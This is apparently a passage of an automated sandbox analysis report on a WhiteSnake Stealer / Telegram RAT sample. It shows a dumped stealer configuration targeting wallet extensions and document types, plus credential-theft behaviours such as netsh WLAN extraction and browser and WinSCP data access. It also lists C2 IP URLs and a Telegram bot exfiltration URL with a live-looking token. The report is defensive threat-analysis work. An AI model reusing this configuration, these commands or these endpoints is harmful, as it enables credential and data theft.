name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.;cc.;cxx.;hpp.;cs.;java.;ts.;php.;rb.;rs.;swift.;kt.;kts.;pl.;r.;sh.;lua.;py.;go.;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.;cc.;cxx.;hpp.;cs.;java.;ts.;php.;rb.;rs.;swift.;kt.;kts.;pl.;r.;sh.;lua.;py.;go.;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.*;cc.

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match

File source: Process Memory Space: 73ybGtnYXx.exe PID: 4296, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: 73ybGtnYXx.exe PID: 4296, type: MEMORYSTR

Yara detected WhiteSnake Stealer

Source: Yara match	File source: 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 73ybGtnYXx.exe PID: 4296, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Timestomp	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	11 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	151 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	4 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
73ybGtnYXx.exe	59%	Virustotal		Browse
73ybGtnYXx.exe	71%	ReversingLabs	Win32.Trojan.WhiteSnake
73ybGtnYXx.exe	100%	Avira	HEUR/AGEN.1307453

Source	Detection	Scanner	Label
http://167.99.138.249:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%	0%	Avira URL Cloud	safe
http://95.216.147.179	0%	Avira URL Cloud	safe
http://206.189.109.146:80/2r1j6_user	0%	Avira URL Cloud	safe
https://138.2.92.67:443	0%	Avira URL Cloud	safe
https://5.196.181.135:443/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7	0%	Avira URL Cloud	safe
http://107.161.20.142:8080	0%	Avira URL Cloud	safe
https://5.196.181.135:443	0%	Avira URL Cloud	safe
http://206.166.251.4:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7	0%	Avira URL Cloud	safe
http://185.217.98.121:8080/get/hX8i6V7aqg/2r1j6_user	0%	Avira URL Cloud	safe
https://192.99.196.191:443	0%	Avira URL Cloud	safe
https://101.126.19.171:443	0%	Avira URL Cloud	safe
http://66.42.56.128:80	0%	Avira URL Cloud	safe
http://194.164.198.113:8080/2r1j6_user	0%	Avira URL Cloud	safe
http://8.219.110.16:9999	0%	Avira URL Cloud	safe
http://45.82.65.63	0%	Avira URL Cloud	safe
https://5.196.181.135/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
http://45.82.65.63:80/2r1j6_user	0%	Avira URL Cloud	safe
http://129.151.109.160:8080	0%	Avira URL Cloud	safe
http://95.216.147.179:80	0%	Avira URL Cloud	safe
https://5.196.181.135:443/2r1j6_user	0%	Avira URL Cloud	safe
http://95.216.147.179:80/2r1j6_user	0%	Avira URL Cloud	safe
http://46.4.73.118:9000/2r1j6_user	0%	Avira URL Cloud	safe
http://159.203.174.113:8090	0%	Avira URL Cloud	safe
http://95.216.147.179/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
http://45.82.65.63:80/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
http://194.164.198.113	0%	Avira URL Cloud	safe
http://167.99.138.249:80802(	0%	Avira URL Cloud	safe
http://206.189.109.146:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7	0%	Avira URL Cloud	safe
http://167.99.138.249:8080/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
http://45.82.65.63:80	0%	Avira URL Cloud	safe
https://5.196.181.135:443/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
http://194.164.198.113:80802(	0%	Avira URL Cloud	safe
http://41.87.207.180:9090	0%	Avira URL Cloud	safe
http://194.164.198.113:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F	0%	Avira URL Cloud	safe
https://5.196.181.135	0%	Avira URL Cloud	safe
http://45.82.65.63:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%74	0%	Avira URL Cloud	safe
http://185.217.98.121:80	0%	Avira URL Cloud	safe
http://206.166.251.4:8080/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
http://206.189.109.146/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
https://44.228.161.50:443	0%	Avira URL Cloud	safe
http://101.43.160.136:8080	0%	Avira URL Cloud	safe
http://206.166.251.4:80802(	0%	Avira URL Cloud	safe
http://47.110.140.182:8080	0%	Avira URL Cloud	safe
http://185.217.98.121:8080/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
http://168.138.211.88:8099	0%	Avira URL Cloud	safe
http://167.99.138.249:8080	0%	Avira URL Cloud	safe
http://18.228.80.130:80	0%	Avira URL Cloud	safe
http://167.99.138.249:8080/2r1j6_user	0%	Avira URL Cloud	safe
http://167.99.138.249	0%	Avira URL Cloud	safe
http://185.217.98.121:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%	0%	Avira URL Cloud	safe
http://45.82.65.63/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
http://185.217.98.121:8080	0%	Avira URL Cloud	safe
http://185.217.98.121:8080/hX8i6V7aqg/2r1j6_user	0%	Avira URL Cloud	safe
http://206.166.251.4	0%	Avira URL Cloud	safe
http://206.166.251.4:8080/2r1j6_user	0%	Avira URL Cloud	safe
http://206.189.109.146:80/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
http://194.164.198.113:8080/2r1j6_user%40358075_report.wsr	0%	Avira URL Cloud	safe
http://206.189.109.146	0%	Avira URL Cloud	safe
http://47.96.78.224:8080	0%	Avira URL Cloud	safe
https://154.9.207.142:443	0%	Avira URL Cloud	safe
http://46.4.73.118	0%	Avira URL Cloud	safe
http://206.166.251.4:8080	0%	Avira URL Cloud	safe
http://185.217.98.121:8080/2r1j6_user	0%	Avira URL Cloud	safe
http://185.217.98.121:80802(	0%	Avira URL Cloud	safe
http://8.134.71.132:8082	0%	Avira URL Cloud	safe
http://101.126.19.171:80	0%	Avira URL Cloud	safe
http://194.164.198.113:8080	0%	Avira URL Cloud	safe
http://95.216.147.179:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72	0%	Avira URL Cloud	safe
http://116.202.101.219:8080	0%	Avira URL Cloud	safe
http://185.217.98.121	0%	Avira URL Cloud	safe
http://38.60.191.38:80	0%	Avira URL Cloud	safe
http://46.4.73.118:9000/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%	0%	Avira URL Cloud	safe
https://5.196.181.135/2r1j6_user%40358075_report.wsrp	0%	Avira URL Cloud	safe
http://185.217.98.121:8080/get	0%	Avira URL Cloud	safe
http://101.132.223.26:8080	0%	Avira URL Cloud	safe
http://46.4.73.118:9000	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ip-api.com	208.95.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
171.39.242.20.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line?fields=query,country	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://95.216.147.179	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://5.196.181.135:443/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	false		high
https://138.2.92.67:443	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://206.189.109.146:80/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://167.99.138.249:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.161.20.142:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://5.196.181.135:443	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.217.98.121:8080/get/hX8i6V7aqg/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://206.166.251.4:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FD5E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://192.99.196.191:443	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://101.126.19.171:443	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://194.164.198.113:8080/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.42.56.128:80	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://45.82.65.63	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ip-api.com	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCE2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.82.65.63:80/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.219.110.16:9999	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://5.196.181.135:443/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.196.181.135/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://129.151.109.160:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://95.216.147.179:80	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	false		high
http://95.216.147.179:80/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://46.4.73.118:9000/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://194.164.198.113	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.w3.or	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com/line?fields=query	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://159.203.174.113:8090	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.82.65.63:80/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.216.147.179/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://206.189.109.146:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://167.99.138.249:8080/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	false		high
http://167.99.138.249:80802(	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.82.65.63:80	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://41.87.207.180:9090	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://api.telegram.org	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	false		high
https://5.196.181.135:443/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://206.166.251.4:8080/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.82.65.63:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%74	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.217.98.121:80	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.telegram.org	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://194.164.198.113:80802(	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://194.164.198.113:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.196.181.135	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://206.189.109.146/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	false		high
https://44.228.161.50:443	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://101.43.160.136:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://47.110.140.182:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://168.138.211.88:8099	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.217.98.121:8080/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://206.166.251.4:80802(	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.228.80.130:80	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://167.99.138.249	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://167.99.138.249:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://167.99.138.249:8080/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.217.98.121:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=72591	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.82.65.63/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.217.98.121:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://206.189.109.146	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://206.189.109.146:80/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.217.98.121:8080/hX8i6V7aqg/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://206.166.251.4:8080/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://194.164.198.113:8080/2r1j6_user%40358075_report.wsr	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.96.78.224:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
